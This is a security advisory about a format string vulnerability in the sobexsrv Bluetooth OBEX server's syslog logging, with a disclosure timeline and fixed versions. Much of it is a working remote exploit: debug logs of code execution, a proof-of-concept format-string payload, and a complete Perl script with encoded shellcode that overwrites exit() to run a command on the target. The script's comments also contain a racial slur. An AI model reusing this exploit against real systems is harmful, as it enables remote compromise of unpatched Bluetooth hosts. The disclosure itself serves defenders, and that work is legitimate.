|
|
|
|
| |
sobexsrv is "a Bluetooth OBEX server with Bluetooth Security Mode-2 (application triggered security) support. It implements OPUSH (put), OPULL (get) and OBEX-FTP (setpath + directory listing) and therefore is a full OBEX server. sobexsrv was designed with flexibility and security in mind".
A format string vulnerability has been discovered in sobexsrv secure scripting OBEX server. |
| |
Credit:
The information has been provided by Kevin Finisterre.
|
| |
Vulnerable Systems:
* sobexsrv version 1.0.0
Immune Systems:
* sobexsrv version 1.0.0 pre4
Simple setup using the internal mode, logging with syslog(8) and INBOX in /tmp.
sobexsrv -IS -r /tmp
Simple secure setup with chroot and Bluetooth security mode-2.
sobexsrv -s 2 -ISR -l X -r /tmp
In both examples shown above the -S option is used to enable syslog() logging. A format string issue was located almost immediately in the syslog support for the logging functions. Several instances of user input are passed to an unformatted syslog() call when using dosyslog().
kfinisterre@animosity:~/sobexsrv-1.0.0_pre3$ grep syslog\( . -rin
./src/obexsrv.c:58: void dosyslog(char *m1, void *m2, void *m3)
./src/obexsrv.c:71: syslog(LOG_INFO, log);
...
./src/obexsrv.c:203: dosyslog("folder listing for \"%s\"\n", path, 0);
./src/obexsrv.c:290: if (ret) dosyslog("pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:291: else dosyslog("failed pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:334: if (ret) dosyslog("pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:335: else dosyslog("faild pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:356: if (ret) dosyslog("deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:357: else dosyslog("failed deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:401: dosyslog("created directory \"%s\"\n", fullpath, 0);
./src/obexsrv.c:406: dosyslog("failed to create directory \"%s\"\n", fullpath, 0);
...
As an example used a windows machine with the Widcomm bluetooth stack to create a folder named "--AAAABBBB%19$x.%20$x" on a remote host. The My Bluetooth Places icon provides an OBEX ftp interface which worked perfect for a quick verification of the bug.
Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connecting...
Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connected
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] folder listing for "/tmp"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] created directory "/tmp//---AAAABBBB41414141.42424242"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnecting...
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnected
The host in this example is a PowerPC Linux box so keep in mind that the x86 offsets will differ.
This vulnerability is pretty trivial to exploit as shown below. We run the server in debug mode so that we can see what is going on a little better. Then we exploit it with a scripted ussp-push.
kfinisterre@threat:~$ sobexsrv -ISd -r /home/kfinisterre/
security: mode = 1
REQHINT - add handler for this!
CONNECT start
CONNECT ok, result = 1
CONNECT end
REQDONE
REQHINT - add handler for this!
PUT start
PUT name:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA
PUT length: 201
PUT body length: 201
PUT data_type 1
internal_handler: put for
"/home/kfinisterre//%1997.d%27$hn%76819.d%28$hnAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
length=201
PUT ok
PUT end
REQDONE
REQHINT - add handler for this!
DISCONNECT start
DISCONNECT end
uid=1000(kfinisterre) gid=1000(kfinisterre)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)
As you can see we were able to deliver a /bin/sh payload and have the daemon run /usr/bin/id for us.
This is what things look like from the attackers point of view.
animosity:/home/kfinisterre/ussp-push-0.4# ./sobexsrv.pl
pushing file /tmp/shellcode
name=/tmp/shellcode, size=201
Registered transport
set user data
created new objext
Local device 00:11:B1:07:BE:A7
Remote device 00:0B:0D:63:0B:CC (1)
started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!
Connection return code: 0, id: 0
Connection established
connected to server
Sending file:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,
path: /tmp/shellcode, size: 201
reqdone
Command (02) has now finished, rsp: 20reqdone
Command (01) has now finished, rsp: 20Disconnect done!pushed!!
Exploit:
#!/usr/bin/perl
#
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
#
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch!
#
$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents.
# R_386_JUMP_SLOT exit()
$addy = "\x5a\x19\x05\x08";
$addy2 = "\x58\x19\x05\x08";
$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;
$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;
#print "hi: $hi\n";
#print "lo: $lo\n";
$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200;
#print $string . "\n";
$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35".
"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e".
"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56".
"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30".
"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56".
"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35".
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";
open(F, "> /tmp/shellcode") or die "can't open file";
print F "$sc\n";
close(F);
system($string);
Workaround:
The Author issued the following temporary warning before patching the problem.
"the syslog (-S) function of sobexsrv is vulnerable to a format string attack and therefore should not be used as of now!"
Fixed versions are available at the following locations.
http://www.mulliner.org/bluetooth/sobexsrv-1.0.0pre4.tar.gz
http://www.mulliner.org/bluetooth/sobexsrv_1.0.0pre4-1_i386.deb
http://www.mulliner.org/nokia770/feed/sobexsrv_1.0.0pre4-1_arm.deb (maemo binary)
Disclosure Timeline:
* 03.11.05 - sobexsrv to trifinite.blog posted by Collin Mulliner
* 23.11.05 - vendor notification
* 25.11.05 - sobexsrv-1.0.0pre4.tar.gz released
|
|
|
|
|
